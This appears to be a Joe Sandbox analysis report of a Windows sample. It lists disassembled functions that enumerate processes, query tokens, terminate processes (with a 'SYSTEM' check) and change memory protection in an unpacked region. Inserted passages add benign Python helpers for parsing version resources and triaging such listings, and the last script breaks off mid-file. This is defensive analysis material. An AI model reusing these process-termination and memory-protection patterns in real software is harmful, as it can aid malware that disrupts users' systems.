                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Message$SendWindow$PostProcQuitShowwsprintf
                                    • String ID: System process can't been terminated!$The application name can't be found. Please make sure whether the name is right!$View All Processes$View My Processes$Windows Notification$iPos=%d
                                    • API String ID: 4014529712-140908480
                                    • Opcode ID: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction ID: b9e1b8610fbedb75af30f79fd81a6c46aadfc3012c35c013c55d51da3f45cb0f
                                    • Opcode Fuzzy Hash: 746f52bec132f143904a4d114beca3bddeb3b89a76c870e33d9bf59fe38b171c
                                    • Instruction Fuzzy Hash: 8061E7B2610201FBD734AB64EC59BE733A4A788300F14893BE556B76D0E738AC4D8B5D
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: wsprintf$MessageSend
                                    • String ID: Description$Memory$Process ID$Process Name$User Name$d
                                    • API String ID: 12235790-2901759098
                                    • Opcode ID: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction ID: 279726ffbfae14383190c6c753e1979e50f314c5c8a28d2d91e27df4f51d6de9
                                    • Opcode Fuzzy Hash: e5dbcb87020978b1e542e2b3685ea65f06ad9b3c102300a686b14875117c4917
                                    • Instruction Fuzzy Hash: 772161B1A48340AFC360CF65C895B9BBBE4EB89704F504D2FF08893240D7B99945CF9A
                                    APIs
                                    • OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                    • GetTokenInformation.ADVAPI32(?,00000001(TokenUser),?,0000012C,?), ref: 0040E2FF
                                    • CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • wsprintfW.USER32 ref: 0040E3AE
                                    • wsprintfW.USER32 ref: 0040E3CD
                                    • wsprintfW.USER32 ref: 0040E3E4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                    • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: wsprintf$Token$CloseHandleInformationOpenProcess
                                    • String ID: %s %s$GetTokenInformation$LookupAccountSid$OpenProcessToken
                                    • API String ID: 2594950064-3173787032
                                    • Opcode ID: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
                                    • Instruction ID: affa38bc1eb5f0fd5749b03f1417e1fb464e194ef1bd6555a84b7e3c49497071
                                    • Opcode Fuzzy Hash: e7827d6f24756a15ea7fd67e0d12da55e7482696f9941f31bcf56fd5c500a86e
                                    • Instruction Fuzzy Hash: C741A371508301ABE720CF25C845BEB77E8ABC8744F044D2EF88993291E778A955CB9A
                                    APIs
                                    • QueryFullProcessImageNameW.KERNEL32 ref: 0040E4F3
                                      • Part of subcall function 0040E170: GetLastError.KERNEL32 ref: 0040E18D
                                      • Part of subcall function 0040E170: FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,00000100,00000100,00000000), ref: 0040E1AE
                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0040E536
                                    • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 0040E577
                                    • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,00000000,00000000), ref: 0040E594
                                    • wsprintfW.USER32 ref: 0040E5C3
                                    • VerQueryValueW.VERSION(00000000,?,?,?,?,?,00000000,00000000), ref: 0040E5DC
                                    • _wcsncpy.LIBCMT ref: 0040E652
                                    Strings
                                    • \StringFileInfo\%04X%04X\FileDescription, xrefs: 0040E5BD
                                    • \VarFileInfo\Translation, xrefs: 0040E58E
                                    • QueryFullProcessImageName, xrefs: 0040E4FD
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Query$FileInfoValueVersion$ErrorFormatFullImageLastMessageNameProcessSize_wcsncpywsprintf
                                    • String ID: QueryFullProcessImageName$\StringFileInfo\%04X%04X\FileDescription$\VarFileInfo\Translation
                                    • API String ID: 3020331544-1601958718
                                    • Opcode ID: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction ID: eaa9ef88b69fa93d3b711ac30ff6fc1bf7e9ecaf4ef91606315cd00198441a56
                                    • Opcode Fuzzy Hash: 717397a408e92381d84000f1c6290437c4a0c9b5022d2bdde5cfeda8ea2e2501
                                    • Instruction Fuzzy Hash: F14119725043016BD324EB22DC45FBB73E8AF98744F444D3EF849922D1EA79D908C76A
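The entry above resolves a process's FileDescription in the usual two-step way: QueryFullProcessImageNameW gives the path, GetFileVersionInfoW loads the version resource, VerQueryValueW on \VarFileInfo\Translation yields the language and code page, and those are formatted into \StringFileInfo\%04X%04X\FileDescription (the string at 0040E5BD) for the second VerQueryValueW. As an added illustration, not code from the sample or from the report, the pure-Python walker below builds a constructed VS_VERSIONINFO blob and performs the same lookup sequence, so the path-building logic can be exercised without Windows. The block serialiser, the sample description text and the language/code page defaults are assumptions of this example.

```python
import struct

# Pure-Python re-implementation of the VerQueryValueW lookup pattern seen at 0040E594/0040E5DC,
# run over a constructed VS_VERSIONINFO blob. Added example; not the sample's own code.

def _pad4(n):
    return (n + 3) & ~3

def _block(key, value=b"", wtype=1, children=()):
    """Serialise one VS_VERSIONINFO-style block: wLength, wValueLength, wType, szKey, pad, Value, pad, children."""
    key_b = key.encode("utf-16-le") + b"\x00\x00"
    header_len = 6 + len(key_b)
    body = b"\x00" * (_pad4(header_len) - header_len)
    body += value + b"\x00" * (_pad4(len(value)) - len(value))
    for child in children:
        body += child
    total = header_len + len(body)
    vlen = len(value) // 2 if wtype == 1 else len(value)   # text values are counted in WCHARs
    return struct.pack("<HHH", total, vlen, wtype) + key_b + body + b"\x00" * (_pad4(total) - total)

def build_sample_versioninfo(description, lang=0x0409, codepage=0x04B0):
    """Constructed resource: VS_FIXEDFILEINFO (signature only), one string table, one Translation entry."""
    fixed = struct.pack("<LL", 0xFEEF04BD, 0x00010000) + b"\x00" * 44    # 52-byte VS_FIXEDFILEINFO
    string_entry = _block("FileDescription", description.encode("utf-16-le") + b"\x00\x00")
    lang_table = _block("%04X%04X" % (lang, codepage), children=[string_entry])
    sfi = _block("StringFileInfo", children=[lang_table])
    translation = _block("Translation", struct.pack("<HH", lang, codepage), wtype=0)
    vfi = _block("VarFileInfo", children=[translation])
    return _block("VS_VERSION_INFO", fixed, wtype=0, children=[sfi, vfi])

def _parse_block(buf, off):
    """Parse one block at a DWORD-aligned offset; returns (node, offset of the next sibling)."""
    wlen, vlen, wtype = struct.unpack_from("<HHH", buf, off)
    end = off + wlen
    p = off + 6
    q = p
    while buf[q:q + 2] != b"\x00\x00":   # szKey is a NUL-terminated UTF-16LE string
        q += 2
    key = buf[p:q].decode("utf-16-le")
    p = _pad4(q + 2)
    vbytes = vlen * 2 if wtype == 1 else vlen
    value = buf[p:p + vbytes]
    p = _pad4(p + vbytes)
    children = []
    while p < end:
        child, p = _parse_block(buf, p)
        children.append(child)
    return {"key": key, "type": wtype, "value": value, "children": children}, _pad4(end)

def ver_query_value(blob, sub_block):
    """Walk a backslash path the way VerQueryValueW does; returns the raw Value bytes or None."""
    node, _ = _parse_block(blob, 0)
    for part in sub_block.strip("\\").split("\\"):
        node = next((c for c in node["children"] if c["key"].lower() == part.lower()), None)
        if node is None:
            return None
    return node["value"]

def file_description(blob):
    """Translation -> language/code page pair -> FileDescription: the sequence the listing above shows."""
    translation = ver_query_value(blob, "\\VarFileInfo\\Translation")
    if translation is None or len(translation) < 4:
        return None
    lang, codepage = struct.unpack_from("<HH", translation, 0)
    path = "\\StringFileInfo\\%04X%04X\\FileDescription" % (lang, codepage)   # format string seen at 0040E5BD
    value = ver_query_value(blob, path)
    return None if value is None else value.decode("utf-16-le").rstrip("\x00")

if __name__ == "__main__":
    blob = build_sample_versioninfo("Host Process for Windows Services")   # constructed description text
    print(file_description(blob))
```

A real resource can carry several Translation pairs; the sample's code reads only the first, which is what file_description mirrors. The first wsprintfW in the listing (0040E5C3) is the %04X%04X formatting step.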
                                    APIs
                                    • SetLastError.KERNEL32(0000007F), ref: 020E14DB
                                    • SetLastError.KERNEL32(0000007F), ref: 020E1507
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_20e1000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: ErrorLast
                                    • String ID:
                                    • API String ID: 1452528299-0
                                    • Opcode ID: 572edad0e6a7003d4b6a09a2481ca24e2fc325748b3e5ba5c9a858bfadb08a85
                                    • Instruction ID: 47e2216d65cba6e9897770bd83dc728bff5c2615ee91574a75403075f9f1f1b5
                                    • Opcode Fuzzy Hash: 572edad0e6a7003d4b6a09a2481ca24e2fc325748b3e5ba5c9a858bfadb08a85
                                    • Instruction Fuzzy Hash: 4471C4B4E04209EFDF08DF94C591BADB7B2BF48304F248599D51AAB391D734AE81DB90
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess__wcsdup_memset
                                    • String ID: D
                                    • API String ID: 169418676-2746444292
                                    • Opcode ID: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction ID: 0b47bd45ec23967565d9eba1f3cace27cbad009f0a552ed0d82179670a4d4d1e
                                    • Opcode Fuzzy Hash: 85112b14f432fe8e92b2228129b8667fad4ace48c94bb840cbc2fdde4ee473de
                                    • Instruction Fuzzy Hash: DB0167B15043006BD310EF69CD41B8B7BE9AF88B40F40891EF659D7240E7B9D9448B97
                                    APIs
                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041BDC8,00000008,00413909,00000000,00000000,?,?,00413936,?,00410F75,?,?,00412311,?,?), ref: 00413812
                                    • __lock.LIBCMT ref: 00413846
                                      • Part of subcall function 00414855: __mtinitlocknum.LIBCMT ref: 0041486B
                                      • Part of subcall function 00414855: __amsg_exit.LIBCMT ref: 00414877
                                      • Part of subcall function 00414855: EnterCriticalSection.KERNEL32(?,?,?,0041384B,0000000D), ref: 0041487F
                                    • InterlockedIncrement.KERNEL32(0041D6E0), ref: 00413853
                                    • __lock.LIBCMT ref: 00413867
                                    • ___addlocaleref.LIBCMT ref: 00413885
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                    • String ID: KERNEL32.DLL
                                    • API String ID: 637971194-2576044830
                                    • Opcode ID: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction ID: 08fdddae76046f13a4609d0da6d3235dc21c8c00c6474d33689b1c42df5d2c84
                                    • Opcode Fuzzy Hash: 505229052a6e4527589a65c49ba15e4997feadab8069fec7672dd3e55b735240
                                    • Instruction Fuzzy Hash: 2D016171941B00DBD720AF66D8067C9BBE0AF50329F20851FE499966A0CBB8A6C4CB19
                                    APIs
                                    • __getptd.LIBCMT ref: 00412B53
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412B64
                                    • __getptd.LIBCMT ref: 00412B72
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: __getptd$__amsg_exit__getptd_noexit
                                    • String ID: MOC$RCC$csm
                                    • API String ID: 803148776-2671469338
                                    • Opcode ID: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction ID: 0f2876ffef59d3c6b375385131f6e652370e27b5964fd21b7b7078cf082998b9
                                    • Opcode Fuzzy Hash: 66b2e007dd2f0717e7ab3a31a7d58449cee3c19ef04977a7d51ab5e99ac2dfe5
                                    • Instruction Fuzzy Hash: 9AE0ED359186088EC724AF69C18ABE933A5EB44319F1510A7A44DCB223D7ACEAE0854A
                                    APIs
                                    • __CreateFrameInfo.LIBCMT ref: 00412E0C
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106A8
                                      • Part of subcall function 0041069A: __getptd.LIBCMT ref: 004106B6
                                    • __getptd.LIBCMT ref: 00412E16
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00412E24
                                    • __getptd.LIBCMT ref: 00412E32
                                    • __getptd.LIBCMT ref: 00412E3D
                                    • _CallCatchBlock2.LIBCMT ref: 00412E63
                                      • Part of subcall function 0041073F: __CallSettingFrame@12.LIBCMT ref: 0041078B
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F19
                                      • Part of subcall function 00412F0A: __getptd.LIBCMT ref: 00412F27
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                    • String ID:
                                    • API String ID: 1602911419-0
                                    • Opcode ID: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction ID: 7569b259fc3e624cf5a97b96a7300a54ad765ced98981fdc73afb8e83ec2d13a
                                    • Opcode Fuzzy Hash: 6c28b232d037bb653eeda2a51553b0eea48fe0f0670f77926a949ef858724b48
                                    • Instruction Fuzzy Hash: C011E4B5D002099FDB00EFA5D986BED7BB0FF04315F10806AF854AB251DB789A919F58
                                    APIs
                                    • __getptd.LIBCMT ref: 00414EBC
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __amsg_exit.LIBCMT ref: 00414EDC
                                    • __lock.LIBCMT ref: 00414EEC
                                    • InterlockedDecrement.KERNEL32(?), ref: 00414F09
                                    • _free.LIBCMT ref: 00414F1C
                                    • InterlockedIncrement.KERNEL32(022D1660), ref: 00414F34
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                    • String ID:
                                    • API String ID: 3470314060-0
                                    • Opcode ID: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction ID: 34fd155b25c25adfe3620824084a2b0933ecb3f9ce2fde051769732d93a5196a
                                    • Opcode Fuzzy Hash: b789d6f6b5b18bbc2b778a8bb90bc3a3c2b1992aeab1e833d253d5039ca1afb1
                                    • Instruction Fuzzy Hash: 6F015B79E00721ABD711EF669805BDA7760BB44725F15801BE804A7391CB6CAEC2CBDD
                                    APIs
                                    • ___BuildCatchObject.LIBCMT ref: 004131A4
                                      • Part of subcall function 004130FF: ___BuildCatchObjectHelper.LIBCMT ref: 00413135
                                    • _UnwindNestedFrames.LIBCMT ref: 004131BB
                                    • ___FrameUnwindToState.LIBCMT ref: 004131C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                    • String ID: csm$csm
                                    • API String ID: 2163707966-3733052814
                                    • Opcode ID: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction ID: 9332ba3ff9db4df31153ad81b7ccdad3367009c071c3dcb25a55caf6b99e68f4
                                    • Opcode Fuzzy Hash: 1cecf47bf90c724cacb334d80f1f1d72eb2c4336c93fda5b796e22f89546e134
                                    • Instruction Fuzzy Hash: 6001FB7100110ABBDF126F51CC46EEB7F6AEF08355F044016BD1855121DB7AD9F1DBA9
                                    APIs
                                    • __getptd.LIBCMT ref: 0041563D
                                      • Part of subcall function 0041392E: __getptd_noexit.LIBCMT ref: 00413931
                                      • Part of subcall function 0041392E: __amsg_exit.LIBCMT ref: 0041393E
                                    • __getptd.LIBCMT ref: 00415654
                                    • __amsg_exit.LIBCMT ref: 00415662
                                    • __lock.LIBCMT ref: 00415672
                                    • __updatetlocinfoEx_nolock.LIBCMT ref: 00415686
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                    • String ID:
                                    • API String ID: 938513278-0
                                    • Opcode ID: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction ID: e348e55c111b0dd0511f345811d13424c8a431ddd757bbd9f2e15d6ba2996f08
                                    • Opcode Fuzzy Hash: fd4680da6a23a9f95b296ef5c36f84049bab0c1c7715a6f47702f30f0234365f
                                    • Instruction Fuzzy Hash: CBF09676940B10DBD721BB7698027CD3790AF40729F54411FF5489A2D6CB6C49C1CA9D
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
                                    • Instruction ID: 9f36e5016d7a42e12b889a531ce412ab75a6dd073b82eecd34aa996bae1b5947
                                    • Opcode Fuzzy Hash: 7ecdd1ab545dfd2d75c17a70661e833d6c69d2c6112979b4fa8608a3f9d8cbe6
                                    • Instruction Fuzzy Hash: CA11827111830196C734AB599852BFBB3E8EFC4358F144C3EE886C3691FA7C940983AB
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: CloseHandleNextProcess32wsprintf
                                    • String ID: %d K
                                    • API String ID: 2912679758-2382126934
                                    • Opcode ID: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction ID: 51d71b27c4b37dd042226c9a40541835d3d141334fbcb817b22f35dada8c7e80
                                    • Opcode Fuzzy Hash: 9982f50e09bbd1c2d9a7096a7c8064f1faae9819a40c8dc3b266ad468783cfba
                                    • Instruction Fuzzy Hash: 1C01527110830196C734AB589852BFBB3E9EFC4354F044D3EF986C3681EA3C944887AB
                                    APIs
                                    • OpenProcess.KERNEL32(00000401,00000000,?), ref: 0040E6C6
                                      • Part of subcall function 0040E2A0: OpenProcessToken.ADVAPI32 ref: 0040E2D4
                                      • Part of subcall function 0040E2A0: CloseHandle.KERNEL32(?), ref: 0040E35E
                                    • TerminateProcess.KERNEL32(00000000,00000009), ref: 0040E6EE
                                    • CloseHandle.KERNEL32(00000000), ref: 0040E6FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                     • Associated: 00000000.00000002.2389028731.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389059623.0000000000419000.00000002.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389074372.000000000041D000.00000004.00000001.01000000.00000006.sdmp
                                     • Associated: 00000000.00000002.2389089341.0000000000422000.00000002.00000001.01000000.00000006.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_400000_ExeFile (356).jbxd
                                    Similarity
                                    • API ID: Process$CloseHandleOpen$TerminateToken
                                    • String ID: SYSTEM
                                    • API String ID: 1755933052-968218125
                                    • Opcode ID: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction ID: 8e2cb8a182e1328e513b3a34ec3bf5da011a535263a81edc7ae68b639948cf14
                                    • Opcode Fuzzy Hash: a96fa1f771f5afe9f1f92496620a833f797012d06dd2d3e5e1056d7510229cf3
                                    • Instruction Fuzzy Hash: C2F06275A0131067D330AB16AC0DFDB3FA8DBC9B10F418529F959E3282DA38880186AA
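The entry above pairs OpenProcess with desired access 00000401 (PROCESS_TERMINATE | PROCESS_QUERY_INFORMATION) and TerminateProcess with exit code 9, reached through a subcall that opens the process token, and carries the string SYSTEM. As an added triage helper, not part of the report or of the sample, the Python below parses a short excerpt of this listing format (two entries copied from this page and embedded inline) into structured records, decodes the OpenProcess access mask, and flags the two patterns a reviewer would pull out of this section: a kill routine, and VirtualProtect calls in the 020E1000 region that the report marks "based on PE: false". The finding names and the subset of PROCESS_* rights in the lookup table are this example's own choices; sandbox argument captures can be incomplete, so "?" arguments are kept as unknown rather than guessed.

```python
import re

# Constructed excerpt: two function entries copied in the report's own listing format
# (the OpenProcess/TerminateProcess routine at 0040E6C6 and the VirtualProtect pair at 020E2468).
SAMPLE = """\
APIs
• OpenProcess.KERNEL32(00000401,00000000,?), ref: 0040E6C6
  • Part of subcall function 0040E2A0: OpenProcessToken.ADVAPI32 ref: 0040E2D4
  • Part of subcall function 0040E2A0: CloseHandle.KERNEL32(?), ref: 0040E35E
• TerminateProcess.KERNEL32(00000000,00000009), ref: 0040E6EE
• CloseHandle.KERNEL32(00000000), ref: 0040E6FA
Strings
Memory Dump Source
• Source File: 00000000.00000002.2389041717.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Process$CloseHandleOpen$TerminateToken
• String ID: SYSTEM
APIs
• VirtualProtect.KERNEL32(?,00000040,00000004,?), ref: 020E2468
• VirtualProtect.KERNEL32(00000000,000000F8,00000004,?), ref: 020E24B2
Memory Dump Source
• Source File: 00000000.00000002.2389523241.00000000020E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 020E1000, based on PE: false
Similarity
• API ID: ProtectVirtual
• String ID: @
"""

# One listing line: "Name.MODULE(arg,arg,...), ref: ADDR" (the argument list is optional).
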